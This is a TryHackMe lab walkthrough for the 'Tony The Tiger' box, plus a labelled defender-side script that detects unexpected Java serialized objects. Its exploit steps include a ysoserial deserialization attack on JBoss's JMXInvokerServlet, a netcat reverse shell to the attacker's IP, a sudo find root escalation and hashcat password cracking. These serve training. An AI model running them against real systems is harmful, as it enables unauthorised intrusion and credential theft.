TryHackMe — Tony The Tiger Walkthrough

Tony The Tiger

Task 1 Deploy

Task 2 Intro

Task 3 Recon

nmap -sC -sV -oN nmap {IP}
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:97:8c:b9:74:d0:f3:9e:fe:f3:a5:ea:f8:a9:b5:7a (DSA)
|   2048 33:a4:7b:91:38:58:50:30:89:2d:e4:57:bb:07:bb:2f (RSA)
|   256 21:01:8b:37:f5:1e:2b:c5:57:f1:b0:42:b7:32:ab:ea (ECDSA)
|_  256 f6:36:07:3c:3b:3d:71:30:c4:cd:2a:13:00:b5:25:ae (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Hugo 0.66.0
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Tony's Blog
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss AS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Task 4 Tony’s Flag

strings tony.jpg

Task 5 Exploit!

gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections5', args.command])
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)

nc -lvnp 8888
python exploit.py --ysoserial-path ysoserial.jar --proto http {IP}:8080 "nc {Self_IP} -e /bin/sh 8888"
python -c 'import pty; pty.spawn("/bin/bash")'
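
The request built in the excerpt above posts a serialized Java object to /invoker/JMXInvokerServlet. As an added example (not part of the original walkthrough or of the exploit script), this defender-side check reads the serialization stream header of a request body and flags an unexpected top-level class on that endpoint. The allowlisted class name, the function names and the sample requests are assumptions constructed for illustration.

```python
import base64
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java serialization magic + stream version 5
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72  # type codes that open an object header
INVOKER_PATH = "/invoker/JMXInvokerServlet"  # endpoint named in the walkthrough
# Assumption: the only top-level class this endpoint should legitimately receive.
EXPECTED_TOP_CLASSES = {"org.jboss.invocation.MarshalledInvocation"}

def top_level_class(body: bytes):
    """First class name in a Java stream; None = no stream, "" = unreadable header."""
    if body[:5] == b"rO0AB":  # base64 encoding of the magic bytes
        try:
            body = base64.b64decode(body, validate=True)
        except ValueError:
            return None
    if not body.startswith(STREAM_MAGIC):
        return None
    if len(body) < 8 or body[4] != TC_OBJECT or body[5] != TC_CLASSDESC:
        return ""
    (length,) = struct.unpack(">H", body[6:8])  # class name is length-prefixed UTF
    name = body[8:8 + length]
    return name.decode("utf-8", "replace") if len(name) == length else ""

def classify(method: str, path: str, body: bytes) -> str:
    cls = top_level_class(body)
    if cls is None:
        return "no-java-stream"
    on_invoker = method == "POST" and path.split("?")[0] == INVOKER_PATH
    if on_invoker and cls not in EXPECTED_TOP_CLASSES:
        return "ALERT-unexpected-class"
    return "expected-invocation" if on_invoker else "java-stream-elsewhere"

def make_stream(cls: str) -> bytes:
    """Build a constructed object header (sample data, not captured traffic)."""
    raw = cls.encode()
    return STREAM_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw

SAMPLES = [  # constructed requests: (method, path, body)
    ("POST", INVOKER_PATH, make_stream("org.jboss.invocation.MarshalledInvocation")),
    ("POST", INVOKER_PATH, make_stream("javax.management.BadAttributeValueExpException")),
    ("POST", "/api/upload", base64.b64encode(make_stream("java.util.HashMap"))),
    ("GET", "/", b""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, classify(method, path, body), top_level_class(body))
```

An allowlist on the top-level class only narrows what reaches the deserializer; restricting access to the invoker servlet remains the primary control.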

Task 6 Find User JBoss' flag

ssh jboss@{IP}

Task 7 Escalation!

sudo -l 
sudo find /etc/passwd -exec /bin/sh \;
hashid {HASH}
hashcat -a 0 -m 0 {HASH} /usr/share/wordlists/rockyou.txt

Final Thoughts

Software Developer at Loanboox

Matheus Antunes de Jesus
